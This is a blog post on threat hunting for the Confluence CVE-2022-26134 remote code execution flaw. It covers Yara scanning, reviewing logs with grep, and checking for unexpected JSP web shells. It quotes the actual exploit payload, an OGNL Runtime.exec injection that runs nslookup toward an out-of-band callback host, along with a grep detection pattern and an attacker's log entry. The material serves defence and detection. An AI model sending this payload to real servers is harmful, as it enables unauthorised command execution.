Open in app

Sign in

Write

Sign in

Hunting for Confluence RCE [CVE-2022–26134]

th3b3ginn3r
3 min readJun 3, 2022

--

On the 2nd of June Atlassian announced that their products — Confluence Server & Confluence Data Center are vulnerable to an RCE vulnerability, now known as CVE-2022–26134. This news shook the internet. Atlassian has not released the patch yet as we are writing. However, the vulnerability is being exploited in the wild.

Update [2022/06/04]: The patch is released now.

https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html/

Since the vulnerability is being actively exploited, many of us would want to know if our Atlassian confluence servers have already been exploited or not.

Here is how we can do it for now.

  1. We can run a Yara scan for the presence of the web shell on your confluence server. Why webshell? Because the threat actors were seen dropping webshells after exploiting the vulnerability as seen by team Volexity team who first unveiled this vulnerability.

Here is how we can do it:

GitHub - th3b3ginn3r/CVE-2022-26134-Exploit-Detection-on-Linux: This repository contains Yara rule…

This repository contains Yara rule and the method that a security investigator may want to use for CVE-2022-26134…

github.com

2. Next, we may want to scan for the IoCs that have been seen exploiting the Confluence vulnerability.

GitHub - offlinehoster/CVE-2022-26134: Information and scripts for the confluence CVE-2022-26134

Information and scripts for the confluence CVE-2022-26134 - GitHub - offlinehoster/CVE-2022-26134: Information and…

github.com

3. We may want to look at the confluence access logs and catalina*.logfor any suspicious activities. We can find these logs in the */atlassian/confluence/logsdirectory, generally.

What does an exploit attempt look like in the logs?

In the confluence logs, exploit attempts for the CVE-2022–26134 would look similar to the one posted below:

https[:]//yourconfluenceserver[.]com/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20cadcl3mfo0aeq0000010mmku8891cnyrp.oast.me%22%29%7D/

If we decode it, here is how it would look:

https://yourconfluenceserver[.]com/${@java.lang.Runtime@getRuntime().exec("nslookup cadcl3mfo0aeq0000010mmku8891cnyrp.oast.me")

Here, the adversary is just checking if the confluence server is vulnerable or not by sending the reverse DNS lookup traffic back to the“*.oast[.]me.” server.

So, when we are hunting for the exploit attempts on our server, we can look for the strings such as ${@java.lag.Runtime().exec( or /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22 in our confluence access logs. It would tell us if someone is attempting to exploit confluence vulnerability.

How can we hunt for exploit attempts?

Basic knowledge of grep usage would be enough to help us in hunting the exploit attempts. Here is what we can do:

I'm running commands in the /confluence/logs/ directory
-----------------------------------------------------
grep -Rinse "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22"http-nio2-8090-exec-77 172.81.129.26 GET / HTTP/1.1 301 66ms - https://yourconfluenceserver.com/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20caddh5iqruadh0010f56nyx1b8oo1j.oast.site%22%29%7D/ Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

As we can see, we got the hit. The confluence server was attempted to be exploited by the adversary for the CVE-2022–26134.

Let us understand the log:

Attacker IP: 172.81.129.26
Method: GET
HTTP Response Code: 300
Exploit: https://yourconfluenceserver.com/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20caddh5iqruadh0010f56nyx1b8oo1j.oast.site%22%29%7D/
User Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Additional Checks

We can also look for the jsp files on the confluence server to make sure any uncommon jsp file is not lying. Generally, confluence implementation has the below jspfiles.

/atlassian/confluence/confluence/noop.jsp
/atlassian/confluence/confluence/errors.jsp
/atlassian/confluence/confluence/errors/notfound.jsp
/atlassian/confluence/confluence/classpath.jsp
/atlassian/confluence/confluence/admin/findspaceattachments.jsp
/atlassian/confluence/confluence/admin/default.jsp
/atlassian/confluence/confluence/admin/cluster/hashclustername.jsp
/atlassian/confluence/confluence/500page.jsp

In case we find additional jsp files on the server, we should try to get answers to the questions like:

  1. When was it created first?
  2. Was it dropped from the internet via the confluence app?

To get the answer to the second question we can refer to the confluence access logs & catalina logs. They should log it if it was dropped via the confluence.

That’s it for now. Do let me know if you have something interesting about this topic and I would update the article for general public usage.

Happy Hunting!

Cve 2022 26134
Confluence
Threat Hunting
Threat Detection

--

--

th3b3ginn3r

Written by th3b3ginn3r

20 Followers

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams